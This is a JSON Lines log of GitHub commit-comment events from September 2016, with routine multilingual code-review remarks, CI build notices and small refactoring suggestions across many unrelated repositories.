{"id":"4548919335","type":"CommitCommentEvent","actor":{"login":"rob-c"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":18983772,"position":7,"line":77,"path":"python/Ganga/test/GPI/FileTests/TestLocalFileClient.py","commit_id":"2e77169c8445bc4120467693638a8d079002c78d","created_at":"2016-09-12T12:14:16Z","updated_at":"2016-09-12T12:14:16Z","body":"audience being myself while I run through other tests whilst running this why?"}},"created_at":"2016-09-12T12:14:16Z"}
{"id":"4548923341","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":18983782,"position":7,"line":174,"path":"spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/ResourceProperties.java","commit_id":"4b55144d80388e43999201ff1b071bbf5b1b8884","created_at":"2016-09-12T12:15:14Z","updated_at":"2016-09-12T12:15:14Z","body":"You can't do that :) About to fix it."}},"created_at":"2016-09-12T12:15:14Z"}
{"id":"4548923421","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18983783,"position":109,"line":109,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:15:15Z","updated_at":"2016-09-12T12:15:15Z","body":"нужно соблюдать аккуратное форматирование кода - если я открою код в редакторе - получается вот так http://joxi.ru/YmEKX0NFZ85G5A - нужно чтобы иерархия вложенности была видна. "}},"created_at":"2016-09-12T12:15:15Z"}
{"id":"4548923630","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983784,"position":4,"line":3,"path":"readme.md","commit_id":"96a6eb0da9bc76e08d8d8e1dad25fb320229f8db","created_at":"2016-09-12T12:15:18Z","updated_at":"2016-09-12T12:15:18Z","body":"I'd add a note here that `geojson-svgify` returns a virtual-dom node."}},"created_at":"2016-09-12T12:15:18Z"}
{"id":"4548928218","type":"CommitCommentEvent","actor":{"login":"jbleyel"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18983800,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-12T12:16:22Z","updated_at":"2016-09-12T12:16:22Z","body":"Master löschen ist nicht so einfach, da sollte man mal einen Git Spezialisten fragen. http://matthew-brett.github.io/pydagogue/gh_delete_master.html"}},"created_at":"2016-09-12T12:16:22Z"}
{"id":"4548930869","type":"CommitCommentEvent","actor":{"login":"tianqi911"},"repo":{"name":"laoshuterry/pinterofc"},"payload":{"comment":{"id":18983808,"position":null,"line":null,"path":null,"commit_id":"a0b93abbee343f65357090a32eb142dff003e913","created_at":"2016-09-12T12:17:00Z","updated_at":"2016-09-12T12:17:00Z","body":"你好。我刚开始看这本书，中文版，有问题怎么能请教你呢？\r\n看了很多C的书，完全不得要领，感觉写实际的单片机程序的时候，还是一团糟，不会用指针。\r\n是不是留言就行。"}},"created_at":"2016-09-12T12:17:00Z"}
{"id":"4548931906","type":"CommitCommentEvent","actor":{"login":"jbleyel"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18983813,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-12T12:17:15Z","updated_at":"2016-09-12T12:17:15Z","body":"Bitte aufpassen, denn oe-a ist ein fork und da kann es sein, das das nicht geht."}},"created_at":"2016-09-12T12:17:15Z"}
{"id":"4548933742","type":"CommitCommentEvent","actor":{"login":"Holzhaus"},"repo":{"name":"reicast/reicast-emulator"},"payload":{"comment":{"id":18983821,"position":null,"line":null,"path":null,"commit_id":"04137ca9501af8709a725d6d6728aeecbe368339","created_at":"2016-09-12T12:17:39Z","updated_at":"2016-09-12T12:17:39Z","body":"This is not the proper location to ask that."}},"created_at":"2016-09-12T12:17:39Z"}
{"id":"4548935103","type":"CommitCommentEvent","actor":{"login":"pouyadadashi"},"repo":{"name":"pouyadadashi/tele.pouya"},"payload":{"comment":{"id":18983825,"position":23,"line":232,"path":"bot/seedbot.lua","commit_id":"01d9e7433819de1c9d8a3db121fb1cb9dd5f2897","created_at":"2016-09-12T12:17:59Z","updated_at":"2016-09-12T12:17:59Z","body":"\r\n 74827916\r\n"}},"created_at":"2016-09-12T12:17:59Z"}
{"id":"4548935879","type":"CommitCommentEvent","actor":{"login":"amiryal"},"repo":{"name":"hashicorp/vault-rails"},"payload":{"comment":{"id":18983828,"position":6,"line":65,"path":"lib/vault/rails.rb","commit_id":"07399786d9fc09c295e93af0df87023eaf26c827","created_at":"2016-09-12T12:18:12Z","updated_at":"2016-09-12T12:18:12Z","body":"Thanks! I submitted [PR #1874](https://github.com/hashicorp/vault/pull/1874) to Vault, and will submit a follow-up PR here if that one gets accepted."}},"created_at":"2016-09-12T12:18:12Z"}
{"id":"4548936707","type":"CommitCommentEvent","actor":{"login":"Sunny609"},"repo":{"name":"Sunny609/test"},"payload":{"comment":{"id":18983832,"position":null,"line":null,"path":null,"commit_id":"3552dd80b7f32f0a60b082a5509336923eb7918b","created_at":"2016-09-12T12:18:23Z","updated_at":"2016-09-12T12:18:23Z","body":"test01"}},"created_at":"2016-09-12T12:18:23Z"}
{"id":"4548941010","type":"CommitCommentEvent","actor":{"login":"ltGuillaume"},"repo":{"name":"MightyCreak/sonerezh"},"payload":{"comment":{"id":18983842,"position":null,"line":null,"path":null,"commit_id":"88d89752d43ae75f33b3b7afabaed59332e4ba7c","created_at":"2016-09-12T12:19:23Z","updated_at":"2016-09-12T12:19:23Z","body":"Nice catch. I think you need to change the same thing on line 166 and line 196 to support all databases. Furthermore, it's even nicer to use 'order' => ['Song.band', 'Song.album'],, so that it's sorted by artist name first, then by album name."}},"created_at":"2016-09-12T12:19:23Z"}
{"id":"4548941023","type":"CommitCommentEvent","actor":{"login":"milliams"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":18983843,"position":7,"line":77,"path":"python/Ganga/test/GPI/FileTests/TestLocalFileClient.py","commit_id":"2e77169c8445bc4120467693638a8d079002c78d","created_at":"2016-09-12T12:19:23Z","updated_at":"2016-09-12T12:19:23Z","body":"I'm just surprised to see comments to yourself in code that you're requesting be pulled into the main release."}},"created_at":"2016-09-12T12:19:23Z"}
{"id":"4548944132","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18983853,"position":null,"line":null,"path":null,"commit_id":"f81a5fe3017d37106ad3d96f26d152f151a7f133","created_at":"2016-09-12T12:20:07Z","updated_at":"2016-09-12T12:20:07Z","body":"Very annoying, yes. But it makes no sense and it looks like a programming error. That's why I added it and hoped that someone would trace and fix the source."}},"created_at":"2016-09-12T12:20:07Z"}
{"id":"4548947789","type":"CommitCommentEvent","actor":{"login":"ligthyear"},"repo":{"name":"RustFestEU/rustfest.eu"},"payload":{"comment":{"id":18983855,"position":5,"line":31,"path":"_posts/2016-09-11-Transportation-at-the-Conference.md","commit_id":"62803540514ecb0c6caae042e20d8518e5c7ef85","created_at":"2016-09-12T12:20:56Z","updated_at":"2016-09-12T12:20:56Z","body":"Because it's easiest? Because on day 1, with only two ways, you can get around cheaper with normal tickets. And on the second day it is only worth it, if you leave the conference venue in between (not everyone will).\r\n\r\nOtherwise a four-pack is much cheaper and would cover you (half the price)"}},"created_at":"2016-09-12T12:20:56Z"}
{"id":"4548948331","type":"CommitCommentEvent","actor":{"login":"simoncoudeville"},"repo":{"name":"getchopstick/chopstick-elements"},"payload":{"comment":{"id":18983856,"position":null,"line":null,"path":null,"commit_id":"c32e69fbfac40252d328bd559f514ef15cd863da","created_at":"2016-09-12T12:21:04Z","updated_at":"2016-09-12T12:21:04Z","body":"This doesn't seem to work anymore. I think the different vendor placeholders need to have separate rules."}},"created_at":"2016-09-12T12:21:04Z"}
{"id":"4548948471","type":"CommitCommentEvent","actor":{"login":"kamikazechaser"},"repo":{"name":"parabola949/Werewolf"},"payload":{"comment":{"id":18983858,"position":null,"line":null,"path":null,"commit_id":"1c83689b10e64177fda4e23a6c3eb0163dfa3a7c","created_at":"2016-09-12T12:21:06Z","updated_at":"2016-09-12T12:21:06Z","body":"Do I get to unlock a contibuters achievement?"}},"created_at":"2016-09-12T12:21:06Z"}
{"id":"4548950581","type":"CommitCommentEvent","actor":{"login":"croptekripp"},"repo":{"name":"SinnerSchraderMobileMirrors/STUtils"},"payload":{"comment":{"id":18983862,"position":null,"line":null,"path":null,"commit_id":"7af2a8de4cc2a47708dc2f1f6b68cdace4b4e30f","created_at":"2016-09-12T12:21:34Z","updated_at":"2016-09-12T12:21:34Z","body":"+1"}},"created_at":"2016-09-12T12:21:34Z"}
{"id":"4548950612","type":"CommitCommentEvent","actor":{"login":"jpata"},"repo":{"name":"jpata/tthbb13"},"payload":{"comment":{"id":18983863,"position":null,"line":null,"path":null,"commit_id":"92cabae815fd272db803c971f8526d3cf5bd0e23","created_at":"2016-09-12T12:21:34Z","updated_at":"2016-09-12T12:21:34Z","body":"branch name is wrong here"}},"created_at":"2016-09-12T12:21:34Z"}
{"id":"4548951535","type":"CommitCommentEvent","actor":{"login":"zhengqiangtan"},"repo":{"name":"zhengqiangtan/spark-core"},"payload":{"comment":{"id":18983866,"position":1,"line":1,"path":"README.md","commit_id":"0bcac87980d2fd5e0283bac0307038a4e0f12888","created_at":"2016-09-12T12:21:48Z","updated_at":"2016-09-12T12:21:48Z","body":"\r\n[Note.txt](https://github.com/zhengqiangtan/spark-core/files/467267/Note.txt)\r\n"}},"created_at":"2016-09-12T12:21:48Z"}
{"id":"4548951541","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18983867,"position":121,"line":121,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:21:48Z","updated_at":"2016-09-12T12:21:48Z","body":"А есть понимание что такое section и что такое article? Вот вам шпаргалка - http://joxi.ru/4AkyN9GTMdZ17m , соответственно нужно переделать, не забудьте что section должен иметь внутри себя заголовок h2-h6."}},"created_at":"2016-09-12T12:21:48Z"}
{"id":"4548951744","type":"CommitCommentEvent","actor":{"login":"croptekripp"},"repo":{"name":"SinnerSchraderMobileMirrors/STUtils"},"payload":{"comment":{"id":18983868,"position":14,"line":14,"path":"STUtils.podspec","commit_id":"7af2a8de4cc2a47708dc2f1f6b68cdace4b4e30f","created_at":"2016-09-12T12:21:50Z","updated_at":"2016-09-12T12:21:50Z","body":"1"}},"created_at":"2016-09-12T12:21:50Z"}
{"id":"4548951976","type":"CommitCommentEvent","actor":{"login":"zhengqiangtan"},"repo":{"name":"zhengqiangtan/spark-core"},"payload":{"comment":{"id":18983870,"position":null,"line":null,"path":null,"commit_id":"0bcac87980d2fd5e0283bac0307038a4e0f12888","created_at":"2016-09-12T12:21:54Z","updated_at":"2016-09-12T12:21:54Z","body":"hello tan zheng qiang "}},"created_at":"2016-09-12T12:21:54Z"}
{"id":"4548952327","type":"CommitCommentEvent","actor":{"login":"huineng"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18983872,"position":null,"line":null,"path":null,"commit_id":"746d2e97ee7e33720a6d63264d43c1c2e10e869d","created_at":"2016-09-12T12:21:59Z","updated_at":"2016-09-12T12:21:59Z","body":"+1"}},"created_at":"2016-09-12T12:21:59Z"}
{"id":"4548953040","type":"CommitCommentEvent","actor":{"login":"RakeshMoturi"},"repo":{"name":"RakeshMoturi/newGitTest"},"payload":{"comment":{"id":18983876,"position":null,"line":null,"path":null,"commit_id":"62f0d766c8a05b4a4e30fd5ca0edb655616e7c2a","created_at":"2016-09-12T12:22:10Z","updated_at":"2016-09-12T12:22:10Z","body":"It is ok to commit-- Review 1"}},"created_at":"2016-09-12T12:22:10Z"}
{"id":"4548958705","type":"CommitCommentEvent","actor":{"login":"zzgo"},"repo":{"name":"cRenJie/Alib"},"payload":{"comment":{"id":18983887,"position":null,"line":null,"path":null,"commit_id":"2e8b90bd3c535bb8297a5f04d117b510bc0d3a53","created_at":"2016-09-12T12:23:30Z","updated_at":"2016-09-12T12:23:30Z","body":"good"}},"created_at":"2016-09-12T12:23:30Z"}
{"id":"4548958758","type":"CommitCommentEvent","actor":{"login":"tabacitu"},"repo":{"name":"se1exin/CRUD"},"payload":{"comment":{"id":18983888,"position":null,"line":null,"path":null,"commit_id":"8430d94d5e083f8e7d05f942e13511ae844816ae","created_at":"2016-09-12T12:23:31Z","updated_at":"2016-09-12T12:23:31Z","body":"1. This. Looks. Awesome. Really good job! Can't wait to take it our for a spin :-)\r\n2. Ultra-minor: I think I found a better icon for the revisions button - _fa-history_; Either you change it or I'll change it when merging, doesn't matter.\r\n\r\nCheers!"}},"created_at":"2016-09-12T12:23:31Z"}
{"id":"4548963397","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18983897,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T12:24:35Z","updated_at":"2016-09-12T12:24:35Z","body":"@LouisGac : yes , i already think of this."}},"created_at":"2016-09-12T12:24:35Z"}
{"id":"4548965856","type":"CommitCommentEvent","actor":{"login":"Hoverbear"},"repo":{"name":"RustFestEU/rustfest.eu"},"payload":{"comment":{"id":18983903,"position":5,"line":31,"path":"_posts/2016-09-11-Transportation-at-the-Conference.md","commit_id":"62803540514ecb0c6caae042e20d8518e5c7ef85","created_at":"2016-09-12T12:25:13Z","updated_at":"2016-09-12T12:25:13Z","body":"Said easiest, not cheapest. :) I'm assuming people will want to travel a bit more than just to-from and this means they don't have to learn the rules as much. My initial thought was a four-pack as well."}},"created_at":"2016-09-12T12:25:13Z"}
{"id":"4548966202","type":"CommitCommentEvent","actor":{"login":"pouyadadashi"},"repo":{"name":"pouyadadashi/tele.pouya"},"payload":{"comment":{"id":18983904,"position":null,"line":null,"path":null,"commit_id":"01d9e7433819de1c9d8a3db121fb1cb9dd5f2897","created_at":"2016-09-12T12:25:16Z","updated_at":"2016-09-12T12:25:16Z","body":"  sudo_users = {74827916},--Sudo users                               \r\n "}},"created_at":"2016-09-12T12:25:16Z"}
{"id":"4548967924","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18983908,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T12:25:40Z","updated_at":"2016-09-12T12:25:40Z","body":"@akorshun   have you test it . \r\n"}},"created_at":"2016-09-12T12:25:40Z"}
{"id":"4548970203","type":"CommitCommentEvent","actor":{"login":"fbacchella"},"repo":{"name":"axboe/fio"},"payload":{"comment":{"id":18983914,"position":null,"line":null,"path":null,"commit_id":"8dc1a870973e20011282059ba124838cdd120dd3","created_at":"2016-09-12T12:26:13Z","updated_at":"2016-09-12T12:26:13Z","body":"This commit breaks build on x86_64. uname -m return x86_64, not amd"}},"created_at":"2016-09-12T12:26:13Z"}
{"id":"4548971574","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18983916,"position":111,"line":111,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:26:31Z","updated_at":"2016-09-12T12:26:31Z","body":"Выше вы разметили блок с фильтрами как aside, но у вас есть еще вторая часть страницы - то что в правой части. Какой бы способ разметки вы не выбрали потом - inline-block или float , у вас в любом случае должно быть два блока. То есть catalog-goods-sorting,  catalog-goods и btn-page-list вам нужно обернуть в 1 большой блок."}},"created_at":"2016-09-12T12:26:31Z"}
{"id":"4548974629","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18983922,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-12T12:27:15Z","updated_at":"2016-09-12T12:27:15Z","body":"a.) Ist es wichtig, was mit dem nicht mehr benutzten master passiert?\r\nb.) Bitte antworte nicht immer an diesem commit, denn der braucht ewig zum Laden ...\r\n"}},"created_at":"2016-09-12T12:27:15Z"}
{"id":"4548975641","type":"CommitCommentEvent","actor":{"login":"nabilrizqi21"},"repo":{"name":"nabilrizqi21/FormPendaftaran"},"payload":{"comment":{"id":18983925,"position":6,"line":6,"path":"README.md","commit_id":"c67764d00e19bb1309bda2e549affeb0b958b749","created_at":"2016-09-12T12:27:27Z","updated_at":"2016-09-12T12:27:27Z","body":"https://drive.google.com/file/d/0B6zIi-3cBsoAWWMwU2JSSGZOcm8/view?usp=sharing"}},"created_at":"2016-09-12T12:27:27Z"}
{"id":"4548975765","type":"CommitCommentEvent","actor":{"login":"yokrysty"},"repo":{"name":"yokrysty/LoLAccountChecker"},"payload":{"comment":{"id":18983927,"position":null,"line":null,"path":null,"commit_id":"727412ce4bd41c12ac1f6d2fabc5c75f53b34034","created_at":"2016-09-12T12:27:29Z","updated_at":"2016-09-12T12:27:29Z","body":"Change it and stop spamming, Riot will ban you. This is not a cracking tool."}},"created_at":"2016-09-12T12:27:29Z"}
{"id":"4548979488","type":"CommitCommentEvent","actor":{"login":"lmartinet"},"repo":{"name":"lmartinet/ISTEX_MentalRotation"},"payload":{"comment":{"id":18983930,"position":6,"line":31,"path":"IstexDoc2Vec.py","commit_id":"1d9d2704f5f94561b82e684d24f51188ac27018d","created_at":"2016-09-12T12:28:20Z","updated_at":"2016-09-12T12:28:20Z","body":"#loads UCBL documents, all the ISTEX documents and some parts of wikipedia if the option is used."}},"created_at":"2016-09-12T12:28:20Z"}
{"id":"4548980815","type":"CommitCommentEvent","actor":{"login":"rob-c"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":18983932,"position":7,"line":77,"path":"python/Ganga/test/GPI/FileTests/TestLocalFileClient.py","commit_id":"2e77169c8445bc4120467693638a8d079002c78d","created_at":"2016-09-12T12:28:38Z","updated_at":"2016-09-12T12:28:38Z","body":"This is __not__ going into the release it's going into a features branch which is still in heavy development. In addition we have a wildly different ways of dealing with the above code in the tests from different authors not being consistent which I'm fixing now."}},"created_at":"2016-09-12T12:28:38Z"}
{"id":"4548982316","type":"CommitCommentEvent","actor":{"login":"ehzShelter"},"repo":{"name":"cs50/ide50"},"payload":{"comment":{"id":18983935,"position":null,"line":null,"path":null,"commit_id":"30ce33b5afedb3265712952239a9d93c17ae5212","created_at":"2016-09-12T12:29:00Z","updated_at":"2016-09-12T12:29:00Z","body":"I swear..!! I am not sure why -lcrypt is necessary?"}},"created_at":"2016-09-12T12:29:00Z"}
{"id":"4548983158","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983937,"position":null,"line":null,"path":null,"commit_id":"f09125c55b3d81867be37d37cb473319bb8f6041","created_at":"2016-09-12T12:29:12Z","updated_at":"2016-09-12T12:29:12Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 243](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1199&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:17"}},"created_at":"2016-09-12T12:29:12Z"}
{"id":"4548983230","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983938,"position":null,"line":null,"path":null,"commit_id":"106f0883108d4a8151108d55bb6e48e804b8dddd","created_at":"2016-09-12T12:29:13Z","updated_at":"2016-09-12T12:29:13Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 244](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1200&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T12:29:13Z"}
{"id":"4548986220","type":"CommitCommentEvent","actor":{"login":"geraldb"},"repo":{"name":"openfootball/it-italy"},"payload":{"comment":{"id":18983941,"position":null,"line":null,"path":null,"commit_id":"95d0258136d9a341e839917ae3891a1cf5f0bca1","created_at":"2016-09-12T12:29:52Z","updated_at":"2016-09-12T12:29:52Z","body":"@noso2k1  Thanks for the 3^ Giornata update.  PS: Will (auto)-update the standing with the yorobot scripts shortly. Cheers."}},"created_at":"2016-09-12T12:29:52Z"}
{"id":"4548986990","type":"CommitCommentEvent","actor":{"login":"krzyzanowskim"},"repo":{"name":"krzyzanowskim/CryptoSwift"},"payload":{"comment":{"id":18983942,"position":null,"line":null,"path":null,"commit_id":"9d24227c379d655ffb1b9ff74d40760065272cba","created_at":"2016-09-12T12:30:03Z","updated_at":"2016-09-12T12:30:03Z","body":"see https://github.com/krzyzanowskim/CryptoSwift/issues/326#issuecomment-246330610"}},"created_at":"2016-09-12T12:30:03Z"}
{"id":"4548989473","type":"CommitCommentEvent","actor":{"login":"pouyadadashi"},"repo":{"name":"pouyadadashi/tele.pouya"},"payload":{"comment":{"id":18983949,"position":13,"line":239,"path":"bot/seedbot.lua","commit_id":"01d9e7433819de1c9d8a3db121fb1cb9dd5f2897","created_at":"2016-09-12T12:30:35Z","updated_at":"2016-09-12T12:30:35Z","body":"  sudo_users = {74827916},--Sudo users                               \r\n "}},"created_at":"2016-09-12T12:30:35Z"}
{"id":"4548991747","type":"CommitCommentEvent","actor":{"login":"pouyadadashi"},"repo":{"name":"pouyadadashi/tele.pouya"},"payload":{"comment":{"id":18983954,"position":13,"line":239,"path":"bot/seedbot.lua","commit_id":"01d9e7433819de1c9d8a3db121fb1cb9dd5f2897","created_at":"2016-09-12T12:31:02Z","updated_at":"2016-09-12T12:31:02Z","body":"  sudo_users = {74827916},--Sudo users                               \r\n "}},"created_at":"2016-09-12T12:31:02Z"}
{"id":"4548993969","type":"CommitCommentEvent","actor":{"login":"mudrd8mz"},"repo":{"name":"danpoltawski/enrol_autoenrol"},"payload":{"comment":{"id":18983957,"position":null,"line":null,"path":null,"commit_id":"f6f4b3cac63d31fa785c698ef22d55c7465fc227","created_at":"2016-09-12T12:31:30Z","updated_at":"2016-09-12T12:31:30Z","body":"We use rev 3b07f70 of this plugin with some recent fix added by Karen Holland that might be related to the problem mentioned by Jeremy. I asked Karen to check this discussion."}},"created_at":"2016-09-12T12:31:30Z"}
{"id":"4548995304","type":"CommitCommentEvent","actor":{"login":"lmartinet"},"repo":{"name":"lmartinet/ISTEX_MentalRotation"},"payload":{"comment":{"id":18983960,"position":45,"line":87,"path":"IstexDoc2Vec.py","commit_id":"1d9d2704f5f94561b82e684d24f51188ac27018d","created_at":"2016-09-12T12:31:47Z","updated_at":"2016-09-12T12:31:47Z","body":"I would actually replace the whole body of the for loop by a code like (maybe we can introduce a function continue to check the 3 conditions, that returns true, only if all the conditions are respected) :\r\n if self.wiki_count < max_nb_wiki_paragraphs and not (len(line.split()) < 2 or line[:8] == '<doc id=') and (paragraphs_per_article_count < paragraphs_per_article):\r\n\t\t\t\t\t\t\tlst = self.UnicodAndTokenize(line)\r\n\t\t\t\t\t\t\tyield LabeledSentence(words = lst ,tags=['WIKI_%s' % str(self.wiki_count)])\r\n\t\t\t\t\t\t\tself.wiki_count += 1\r\n\t\t\t\t\t\t\tparagraphs_per_article_count += 1"}},"created_at":"2016-09-12T12:31:47Z"}
{"id":"4548995344","type":"CommitCommentEvent","actor":{"login":"juliangruber"},"repo":{"name":"datproject/dat.land"},"payload":{"comment":{"id":18983961,"position":null,"line":null,"path":null,"commit_id":"1f9378df72288ef9ed35ff532d48b36cef03cefc","created_at":"2016-09-12T12:31:47Z","updated_at":"2016-09-12T12:31:47Z","body":"fyi, you could also have done\r\n\r\n```js\r\nhandler: link => { window.location.href = '/' + link }\r\n```\r\n\r\nthe problem with the prior line is just that arrow functions without braces add an implicit `return`, which standard considers to be unsafe (idk why though). So the functional equivalent of the old code would have been:\r\n\r\n```js\r\nhandler: function (link) { return window.location.href = '/' + link }\r\n```"}},"created_at":"2016-09-12T12:31:47Z"}
{"id":"4548996463","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18983963,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T12:32:03Z","updated_at":"2016-09-12T12:32:03Z","body":"@sndnvaps @werty100 say it was the same problem on msm8916"}},"created_at":"2016-09-12T12:32:03Z"}
{"id":"4548996557","type":"CommitCommentEvent","actor":{"login":"dardelean"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18983966,"position":21,"line":203,"path":"install-rdo.sh","commit_id":"a4faee43f2434418c9c2a1a029831bc4b9a0c8fb","created_at":"2016-09-12T12:32:05Z","updated_at":"2016-09-12T12:32:05Z","body":"will be commented"}},"created_at":"2016-09-12T12:32:05Z"}
{"id":"4548997259","type":"CommitCommentEvent","actor":{"login":"dardelean"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18983968,"position":18,"line":201,"path":"install-rdo.sh","commit_id":"a4faee43f2434418c9c2a1a029831bc4b9a0c8fb","created_at":"2016-09-12T12:32:14Z","updated_at":"2016-09-12T12:32:14Z","body":"remove comment"}},"created_at":"2016-09-12T12:32:14Z"}
{"id":"4548999592","type":"CommitCommentEvent","actor":{"login":"dardelean"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18983975,"position":24,"line":205,"path":"install-rdo.sh","commit_id":"a4faee43f2434418c9c2a1a029831bc4b9a0c8fb","created_at":"2016-09-12T12:32:45Z","updated_at":"2016-09-12T12:32:45Z","body":"will be commented"}},"created_at":"2016-09-12T12:32:45Z"}
{"id":"4549000064","type":"CommitCommentEvent","actor":{"login":"dmalan"},"repo":{"name":"cs50/ide50"},"payload":{"comment":{"id":18983977,"position":null,"line":null,"path":null,"commit_id":"30ce33b5afedb3265712952239a9d93c17ae5212","created_at":"2016-09-12T12:32:52Z","updated_at":"2016-09-12T12:32:52Z","body":"For CS50's pset2!"}},"created_at":"2016-09-12T12:32:52Z"}
{"id":"4549002476","type":"CommitCommentEvent","actor":{"login":"dardelean"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18983982,"position":41,"line":240,"path":"install-rdo.sh","commit_id":"a4faee43f2434418c9c2a1a029831bc4b9a0c8fb","created_at":"2016-09-12T12:33:26Z","updated_at":"2016-09-12T12:33:26Z","body":"add commnet on why I removed it"}},"created_at":"2016-09-12T12:33:26Z"}
{"id":"4549005317","type":"CommitCommentEvent","actor":{"login":"dardelean"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18983987,"position":48,"line":246,"path":"install-rdo.sh","commit_id":"a4faee43f2434418c9c2a1a029831bc4b9a0c8fb","created_at":"2016-09-12T12:34:06Z","updated_at":"2016-09-12T12:34:06Z","body":"use /tmp instead of /root"}},"created_at":"2016-09-12T12:34:06Z"}
{"id":"4549007997","type":"CommitCommentEvent","actor":{"login":"se1exin"},"repo":{"name":"se1exin/CRUD"},"payload":{"comment":{"id":18983993,"position":null,"line":null,"path":null,"commit_id":"8430d94d5e083f8e7d05f942e13511ae844816ae","created_at":"2016-09-12T12:34:38Z","updated_at":"2016-09-12T12:34:38Z","body":"Awesome, thanks, good to hear you happy with the direction of it. Give me about 3-4 days (I have other work on as well) and I should it to a point where we it is usable and we can review it critically.\n\nI can already forsee a few use cases as being difficult - such as related models and displaying changes such as images. However, the upstream revisionable package seems to cover these pretty well so hopefully its just a case of clear documentation that's inline with upstream's documentation. Either way I'll be taking these into consideration in my work and will let you know if I need any help with the best way to go about it.\n\nGood suggestion in the icon, I'll update it next commit."}},"created_at":"2016-09-12T12:34:38Z"}
{"id":"4549010039","type":"CommitCommentEvent","actor":{"login":"dardelean"},"repo":{"name":"dardelean/install-rdo"},"payload":{"comment":{"id":18984000,"position":68,"line":319,"path":"install-rdo.sh","commit_id":"a4faee43f2434418c9c2a1a029831bc4b9a0c8fb","created_at":"2016-09-12T12:35:07Z","updated_at":"2016-09-12T12:35:07Z","body":"move git install to install_hyperv_networking "}},"created_at":"2016-09-12T12:35:07Z"}
{"id":"4549010500","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18984003,"position":122,"line":122,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T12:35:13Z","updated_at":"2016-09-12T12:35:13Z","body":"нужно исправить на section, тогда название перфоратора у вас будет заголовком h2-h6, плюс нужно сразу разметить блок - который будет показываться поверх картинки при наведении, элементы \"Купить\" и \"В закладки\"  это ни как не список, мы учимся делать семантичную разметку, а это значит что если тег предназначен для того чтобы делать списки - то мы не будем использовать этот тег в других случаях. "}},"created_at":"2016-09-12T12:35:13Z"}
